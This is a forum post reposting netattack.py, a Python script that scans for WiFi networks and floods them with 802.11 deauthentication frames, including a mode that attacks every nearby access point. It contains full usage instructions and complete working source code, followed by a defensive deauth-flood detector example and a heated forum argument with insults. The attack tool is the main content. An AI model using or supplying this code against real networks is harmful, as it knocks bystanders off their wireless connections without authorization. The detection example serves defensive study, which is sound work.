Fi8sVrs

netattack - Scan and Attack Wireless Networks


netattack.py is a Python script that allows you to scan your local area for WiFi networks and perform deauthentication attacks. The effectiveness and power of this script highly depends on your wireless card.

 


NETATTACK 2 RELEASED

https://github.com/chrizator/netattack2/

 

REQUIREMENTS

  • Python 2.5+ (not Python 3+)
  • Modules:
    • scapy
    • argparse
    • sys
    • os
    • threading
    • logging
  • iw(config)
  • OFC LINUX

 

 

USAGE

EASY

SCANNING FOR WIFI NETWORKS

python netattack.py -scan -mon

This example will perform a WiFi network scan. The BSSID, ESSID and the channel will be listed in a table.

-scan | --scan

This parameter must be called when you want to do a scan. It's one of the main commands. It searches for beacon frames that are sent by routers to announce their presence.

-mon | --monitor

By calling this parameter the script automatically detects your wireless card and puts it into monitoring mode to capture the ongoing traffic. If you know the name of your wireless card and it's already working in monitoring mode you can call

-i

This can be used instead of -mon.

 

DEAUTHENTICATION ATTACK

python netattack.py -deauth -b AB:CD:EF:GH:IJ:KL -u 12:34:56:78:91:23 -c 4 -mon

This command will obviously perform a deauthentication attack.

-deauth | --deauth

This parameter is a main parameter as well as scan. It is necessary to call if you want to deauth attack a certain target.

-b | --bssid

With -b you select the AP's MAC address (BSSID). The -deauth parameter requires one or multiple BSSIDs.

-u | --client

If you don't want to attack the whole network, but a single user/client/device, you can do this with -u. It is not necessary.

-c | --channel

By adding this parameter, your deauthentication attack is going to be performed on the entered channel. The usage of -c is highly recommended since the attack will be a failure if the wrong channel is used. The channel of the AP can be seen by doing a WiFi scan (-scan). If you don't add -c the attack will take place on the current channel.

The -mon or -i is necessary for this attack as well.

 

DEAUTHENTICATION ATTACK ON EVERYBODY

python netattack.py -deauthall -i [IFACE]

When this command is called, the script automatically searches for APs in your area. After the search it starts deauth-attacking all of the found APs. The -deauthall parameter only needs an interface to get it working. ATTENTION: If you want all of these attacks to be as efficient as possible, have a look at the following "ADVANCED" section.

 

ADVANCED

-p | --packetburst

This parameter is understood as the packetburst. Especially when you are targeting multiple APs or even performing a -deauthall attack, the command is a must-have. It defines the amount of deauth packets to send after switching the target. When not adding the parameter it is going to be set to 64 by default. But that is highly inefficient if you are attacking 4+ APs.

-t | --timeout

This parameter can be added to a -scan or -deauth. If it's added to the -scan parameter it defines the delay while switching the channel. It is set to 0.75s by default, so it is waiting 0.75s on each channel to collect beacon frames. If it's added to the -deauth parameter, it defines the delay between each packetburst. This can be used to decrease the intensity of the attack or to attack the target(s) at a certain time.

-cf | --channelformat

This parameter can only be added to -scan. It shows a more detailed output while scanning. It's mainly recommended when the location changes and with it the AP's.


Download netattack-master.zip

Mirror:
netattack.py

#!/usr/bin/env python

import sys
import os
import time
import argparse
from threading import Thread
import logging
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
from scapy.all import *
conf.verb = 0

W  = '\033[0m'  # white (normal)
R  = '\033[31m' # red
G  = '\033[32m' # green
O  = '\033[33m' # orange
P  = '\033[35m' # purple
BOLD = '\033[1m' # bold
THIN = '\033[22m' # normal intensity

# creating arguments
def argument_parser():
    parser = argparse.ArgumentParser(usage='''
'''+BOLD+'''SCAN NETWORKS:'''+THIN+O+'''
    -scan       (Main command)'''+W+'''
    -i or -mon  (Interfaces)
    -cf         (More detailed output format)
    -t          (Set channel switch delay)
    -nr         (Don't do a rescan)
'''+BOLD+'''DEAUTH CERTAIN NETWORKS:'''+THIN+O+'''
    -deauth     (Main command)'''+W+'''
    -b          (Add a BSSID)
    -u          (Add a client)
    -i or -mon  (Interfaces)
    -p          (Change Packetburst)
    -t          (set time Interval)
'''+BOLD+'''DEAUTH ALL NETWORKS:'''+THIN+O+'''
    -deauthall  (Main command)'''+W+'''
    -i or -mon  (Interfaces)
    -p          (Packetburst)''')

    parser.add_argument('-mon',
                        '--monitor',
                        action='store_true',
                        help='This activates the monitoring mode \
                              and automatically searches for your wlan device.')
    parser.add_argument('-scan',
                        '--scan',
                        action='store_true',
                        help='This is one of the main parameters. \
                              It searches for all available WiFi-Networks. \
                              Other parameters can be added optionally.')
    parser.add_argument('-cf',
                        '--channelformat',
                        action='store_true',
                        help='It activates the channelformat. \
                              It\'s kind of verbose layout of searching. \
                              Especially useful if searching for 1 network.')
    parser.add_argument('-t',
                        '--timeout',
                        type=float,
                        help='This is setting a delay. \
                              It can be used to add a delay to deauth \
                              or a delay for switching the channel while scanning. \
                              DEFAULT = 0.75')
    parser.add_argument('-nr',
                        '--norescan',
                        action='store_true',
                        help='-nr can only be used with -scan. \
                              This deactivates multiple scans \
                              and stops when channel 14 is reached.')
    parser.add_argument('-deauth',
                        '--deauth',
                        action='store_true',
                        help='This is one of the main parameters. \
                              It deauth-attacks a certain BSSID. \
                              Adding a client is optionally.')
    parser.add_argument('-deauthall',
                        '--deauthall',
                        action='store_true',
                        help='This is one of the main parameters. \
                              It searches all the WiFi Networks near by \
                              and deauth-attacks them.')
    parser.add_argument('-b',
                        '--bssid',
                        nargs='*',
                        help='With this you add a BSSID to a deauth. \
                              It\'s a necessary parameter for -deauth.')
    parser.add_argument('-a',
                        '--amount',
                        default=0,
                        type=int,
                        help='This is the amount of deauth-packages to be send. \
                              It can only be used with -deauth \
                              DEFAULT = infinite')
    parser.add_argument('-u',
                        '--client',
                        default='FF:FF:FF:FF:FF:FF',
                        help='This adds a client to a deauth-attack. \
                              It can only be used with -deauth and is optionally.\
                              DEFAULT = FF:FF:FF:FF:FF:FF (Broadcast)')
    parser.add_argument('-c',
                        '--channel',
                        type=int,
                        help='This adds a channel to a deauth-attack. \
                              It can only be used with -d. \
                              If there is no certain channel the current channel will be used.')
    parser.add_argument('-p',
                        '--packetburst',
                        type=int,
                        default=64,
                        help='This sets the amount of packets in one burst. \
                              It can only be used with -d \
                              DEFAULT = 64')
    parser.add_argument('-i',
                        '--interface',
                        help='This is a necessary parameter. \
                              It calls the monitoring interface. \
                              This parameter needs to be included everywhere.')

    return parser

def throw_error():
    # invalid arguments handling
    if not args.deauth and not args.scan and not args.deauthall and not args.monitor:
        argument_parser().print_usage()
        sys.exit(0)
    if not args.interface and not args.monitor:
        print('[' +R+ '-' +W+'] No interface selected.')
        sys.exit(0)
    if args.deauth and args.channelformat:
        print('[' +R+ '-' +W+'] Parameter -cf not available when deauthing.')
        sys.exit(0)
    if args.deauth and not args.bssid:
        print('[' +R+ '-' +W+'] Error. No BSSID selected.')
        sys.exit(0)
    if args.scan and args.packetburst != 64:
        print('[' +R+ '-' +W+'] Parameter -p not available when scanning.')
        sys.exit(0)
    if args.scan and args.amount:
        print('[' +R+ '-' +W+'] Parameter -a not available when scanning.')
        sys.exit(0)
    if args.scan and args.bssid:
        print('[' +R+ '-' +W+'] Parameter -b not available when scanning.')
        sys.exit(0)
    if args.scan and args.deauth:
        print('[' +R+ '-' +W+'] Scan and Deauth can\'t be executed at the same time.')
        sys.exit(0)
    if args.deauth and args.norescan:
        print('[' +R+ '-' +W+'] Parameter -nr not available when deauthing.')
        sys.exit(0)
    if args.deauthall:
        if args.bssid or args.channel or args.amount or args.deauth or args.norescan or args.timeout or args.channelformat or args.scan:
            print('[' +R+ '-' +W+'] (1) -deauthall -i ["iface"] -p ["packets"]| no more parameters. (2) Remove -deauthall')
            sys.exit(0)
    if args.bssid and args.client != 'FF:FF:FF:FF:FF:FF':
        if len(args.bssid) > 1:
            print('[' +R+ '-' +W+'] Unable to add clients if there are multiple BSSIDs.')
            sys.exit(0)
    if args.interface and args.monitor:
        print('[' +R+ '-' +W+'] You can\'t use -i and -mon. Try only one of them.')
        sys.exit(0)


# # # # # # # # # # # # # # #
#           SCAN            #
# # # # # # # # # # # # # # #

# handling the packages
def pckt_handler(pckt):
    if pckt.haslayer(Dot11): #-> check if pckt type 802.11
        if pckt.type == 0 and pckt.subtype == 8: # check if Beacon frame
            if pckt.addr2 not in APs:
                APs[pckt.addr2] = on_channel #-> add to APs dict
                output_aps(pckt.addr2, pckt.info, on_channel) #-> print it out

# printing found ap
def output_aps(bssid, essid, channel):
    ch_space = 2 # leave different space for channel numbers
    if len(str(channel)) == 1:
        ch_space = 3

    if args.channelformat:
        print('[' +G+ '+' +W+ '] [' +P+ 'BSSID' +W+ '] '+str(bssid).upper()+' '*2+'|'+' '*2+'[' +P+ 'CH' +W+ '] '+str(channel)+' '*ch_space+'|'+' '*2+'[' +P+ 'ESSID' +W+ '] '+essid+'')

    else:
        print(str(bssid).upper() + '  |  ' + str(channel) + ' '*ch_space + '|  ' + str(essid))


# hopping between wifi channels
def channel_hop():
    global on_channel

    timeout = 0.75

    if args.timeout:
        timeout = args.timeout

    if not args.channelformat:
        print('\n[' +O+ '*' +W+ '] Searching for WiFi Networks...\n')
        print(O+ 'MAC' + ' '*19 + 'CH' + ' '*5 + 'ESSID' +W)

    while True:
        if on_channel > 14:
            if args.norescan:
                print('\nPress CTRL-C to quit...')
                sys.exit(0)
            elif not rescan:
                break
            else:
                on_channel = 1
                if args.channelformat:
                    print('\n--------------- RESCAN ---------------\n')
                continue

        if args.channelformat:
            print('[CHANNEL] ' + str(on_channel) + '/14')

        os.system('iwconfig ' + iface + ' channel ' + str(on_channel))

        time.sleep(timeout)
        on_channel += 1


# # # # # # # # # # # # # # #
#           DEAUTH          #
# # # # # # # # # # # # # # #

def set_channel():
    channel = 4
    if args.channel:
        channel = args.channel
    os.system('iwconfig ' + iface + ' channel ' + str(channel))

# creating and managing packets
def deauth(args):
    bssid = args.bssid
    client = args.client
    amount = args.amount
    sleep = 0
    endless = False
    if amount == 0:
        endless = True
    if args.timeout:
        sleep = args.timeout

    while endless:
        for ap in bssid:
            ap_c_pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
            if client != 'FF:FF:FF:FF:FF:FF':
                c_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth()
            try:
                for x in range(args.packetburst):
                    send(ap_c_pckt)
                    if client != 'FF:FF:FF:FF:FF:FF':
                        send(c_ap_pckt)
                print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + ap)
                time.sleep(sleep)
            except(KeyboardInterrupt):
                print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
                sys.exit(0)

    while amount > 0 and not endless:
        for ap in bssid:
            ap_c_pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
            if client != 'FF:FF:FF:FF:FF:FF':
                c_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth()
            try:
                for x in range(args.packetburst):
                    send(ap_c_pckt)
                    if client != 'FF:FF:FF:FF:FF:FF':
                        send(c_ap_pckt)
                print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + ap)

                amount -= 1
                time.sleep(sleep)

            except (KeyboardInterrupt):
                print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
                sys.exit(0)

    print('[' +R+ '!' +W+ '] Finished successfully.')


def deauth_all():
    print('\n[' +O+ '*' +W+ '] Starting deauth...\n')
    while True:
        for ap in APs:
            for x in range(args.packetburst):
                try:
                    ap_c_pckt = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap) / Dot11Deauth()
                    os.system('iwconfig ' + iface + ' channel ' + str(APs[ap]))
                    send(ap_c_pckt)
                except (KeyboardInterrupt):
                    print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
                    sys.exit(0)
            print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + str(ap).upper())


# # # # # # # # # # # # # # #
#           MONITOR         #
# # # # # # # # # # # # # # #

def monitor_on():
    ifaces = os.listdir('/sys/class/net/')
    status = False
    for iface in ifaces:
        if 'wlan' in iface:
            print('\n[' +G+ '+' +W+ '] Interface found!\nTurning on monitoring mode...')
            os.system('ifconfig ' + iface + ' down')
            os.system('iwconfig ' + iface + ' mode monitor')
            os.system('ifconfig ' + iface + ' up')
            print('[' +G+ '+' +W+ '] Turned on monitoring mode on: ' + iface)
            status = True
            return iface
    if status == False:
        print('[' +R+ '-' +W+'] No interface found. Try it manually.')
        sys.exit(0)


# # # # # # # # # # # # # # #
#           MAIN            #
# # # # # # # # # # # # # # #

if __name__ == '__main__':
    print(P+'* * * * * * * * * * * * * * * * * *')
    print('* N E T A T T A C K  by chrizator *')
    print('* * * * * * * * * * * * * * * * * *'+W)
    
    args = argument_parser().parse_args()
    APs = {}
    on_channel = 1
    rescan = True

    throw_error()

    iface = None
    if args.interface:
        iface = args.interface
    if args.monitor:
        iface = monitor_on()
    
    conf.iface = iface #-> set scapy's interface

    ## SCAN ##
    if args.scan:
        # channel hopping thread
        hop_t = Thread(target=channel_hop, args=[])
        hop_t.daemon = True
        hop_t.start()


        sniff(iface=iface, prn=pckt_handler, store=0)


    ## DEAUTH ##
    if args.deauth:
        set_channel()
        deauth(args)
        

    ## DEAUTHALL#
    if args.deauthall:
        rescan = False

        hop_t = Thread(target=channel_hop, args=[])
        hop_t.daemon = True
        hop_t.start()

        sniff(iface=iface, prn=pckt_handler, store=0, timeout=13)
        deauth_all()

Source: https://github.com/chrizator/netattack

 

  • Upvote 3
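
For defenders, the bursts this script sends are easy to spot from a monitor-mode sensor. The following is an added example, not part of the original post or of netattack: it parses raw 802.11 management headers and flags a BSSID whose deauth/disassoc frame rate crosses a threshold. It assumes Python 3, frames with the radiotap header already stripped, and constructed MAC addresses, frames, threshold and window.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC = 12, 10          # 802.11 management subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"


def fmt_mac(raw):
    return ":".join("%02x" % b for b in raw)


def parse_teardown(frame):
    """Return (dst, src, bssid, reason) for a deauth/disassoc frame, else None.

    Assumes `frame` starts at the 802.11 header (radiotap already stripped).
    """
    if len(frame) < 26:                      # 24-byte header + 2-byte reason code
        return None
    fc = frame[0]
    version, ftype, subtype = fc & 0x3, (fc >> 2) & 0x3, fc >> 4
    if version != 0 or ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return fmt_mac(frame[4:10]), fmt_mac(frame[10:16]), fmt_mac(frame[16:22]), reason


class DeauthFloodDetector:
    """Alert once per BSSID when >= threshold teardown frames fall in `window` s."""

    def __init__(self, threshold=30, window=1.0):
        self.threshold, self.window = threshold, window
        self.times = defaultdict(deque)      # bssid -> recent frame timestamps
        self.alerted = set()

    def feed(self, ts, frame):
        parsed = parse_teardown(frame)
        if parsed is None:
            return None
        dst, _src, bssid, reason = parsed
        q = self.times[bssid]
        q.append(ts)
        while ts - q[0] > self.window:       # drop timestamps outside the window
            q.popleft()
        if len(q) < self.threshold or bssid in self.alerted:
            return None
        self.alerted.add(bssid)
        return {"bssid": bssid, "count": len(q),
                "broadcast": dst == BROADCAST, "reason": reason}


def constructed_frame(subtype, dst, src, bssid, reason=1):
    """Test fixture: header bytes as a sensor would record them (never sent)."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (bytes([subtype << 4, 0]) + b"\x00\x00" + raw(dst) + raw(src)
            + raw(bssid) + b"\x00\x00" + struct.pack("<H", reason))


def run_sample():
    ap_a, ap_b, sta = "02:00:00:00:00:aa", "02:00:00:00:00:bb", "02:00:00:00:00:01"
    capture = [(0.0, constructed_frame(8, BROADCAST, ap_a, ap_a)),    # beacon, ignored
               (1.0, constructed_frame(DEAUTH, sta, ap_b, ap_b, 3))]  # single normal deauth
    # Constructed burst: 64 broadcast deauths in ~0.2 s (the script's default -p is 64)
    capture += [(10.0 + i * 0.003, constructed_frame(DEAUTH, BROADCAST, ap_a, ap_a))
                for i in range(64)]
    detector = DeauthFloodDetector()
    alerts = (detector.feed(ts, frame) for ts, frame in capture)
    return [a for a in alerts if a]


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Enabling 802.11w Protected Management Frames on the AP and clients makes clients discard unauthenticated deauthentication frames like these.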
1 minute ago, fbob said:

Now explain to us ordinary mortals what this does that aircrack-ng doesn't. IMHO the guy who wrote all those lines... has too much free time :)

 

I think it was created for educational purposes, in case you want to see how the aircrack tools work. I bet it's much simpler to read those C sources, that is, if you want to know what the tools you run actually do, or rather the tools I keep Kali.iso for. We could simply limit ourselves to: airmon-ng start wlan0, airodump-ng -i wlan0 --essid plm aircrack, and that's it!

  • Upvote 2
1 hour ago, fbob said:

Now explain to us ordinary mortals what this does that aircrack-ng doesn't. IMHO the guy who wrote all those lines... has too much free time :)

You're the one with too much free time, since you're commenting nonsense. Programming isn't limited to: "what does this one do that the other one doesn't?". That may be your opinion, but it's a bad one (IMHO, of course). Shut up, mind your own business and play with `aircrack-ng` if you can't accept the fact that some people will keep programming whatever the fuck they want even if 20 people before them did exactly the same thing. I'm not going to bother with this any further at this hour.

 

1 hour ago, dancezar said:

I bet it's much simpler to read those C sources

Meh, depends on what level you're at :P I looked at that source a few years ago and... it was kind of chaos :)) I think that was the moment I said: "fuck C, I'm going to learn something else".

 

For those interested, the source is here

  • Upvote 5

14 hours ago, MrGrj said:

You're the one with too much free time, since you're commenting nonsense. Programming isn't limited to: "what does this one do that the other one doesn't?". That may be your opinion, but it's a bad one (IMHO, of course). Shut up, mind your own business and play with `aircrack-ng` if you can't accept the fact that some people will keep programming whatever the fuck they want even if 20 people before them did exactly the same thing. I'm not going to bother with this any further at this hour

 

You completely misunderstood. I agree that anyone can program whatever they want. I don't agree with people who install various programs that do the same thing. Meaning, why would I install netattack instead of aircrack-ng? Does it have something new, something different, something extra? And I don't agree with posts made just for the sake of posting. I see a link to a new program, HOP! I post it. Even if I have no idea what it's for, or whether it's "safe" (for those in the know).

P.S. The style of your replies makes me think you have some issues. I recommend a course of Persedon :)

  • Upvote 1

3 minutes ago, fbob said:

I don't agree with people who install various programs that do the same thing.

Rather than compiling aircrack, which is a huge thing, just to do ONLY deauth (you may be able to compile the deauth tool on its own, I don't know), it's easier to let Python interpret the code above. Plus, if you write crap like this, you learn 1) how to write the crap you want to implement in language x, 2) how the crap you're writing works (in some cases) and 3) how to implement crap y as well as possible. My 2c.

  • Upvote 3

34 minutes ago, fbob said:

I recommend a course of Persedon

 

Pyrithyldione (Presidon, Persedon) is a psychoactive drug invented in 1949. An improved method of manufacture was patented by Roche in 1959. It was used as a hypnotic or sedative and presumed to be less toxic than barbiturates. Today, this substance is no longer used. Agranulocytosis was sometimes reported as adverse effect.

 

Agranulocytosis, also known as agranulosis or granulopenia, is an acute condition involving a severe and dangerous leukopenia (lowered white blood cell count), most commonly of neutrophils causing a neutropenia in the circulating blood. It is a severe lack of one major class of infection-fighting white blood cells. People with this condition are at very high risk of serious infections due to their suppressed immune system.

 

 

Some recommendation, for fuck's sake. When you guys pop pills, do you ever look elsewhere to see what they're actually about?
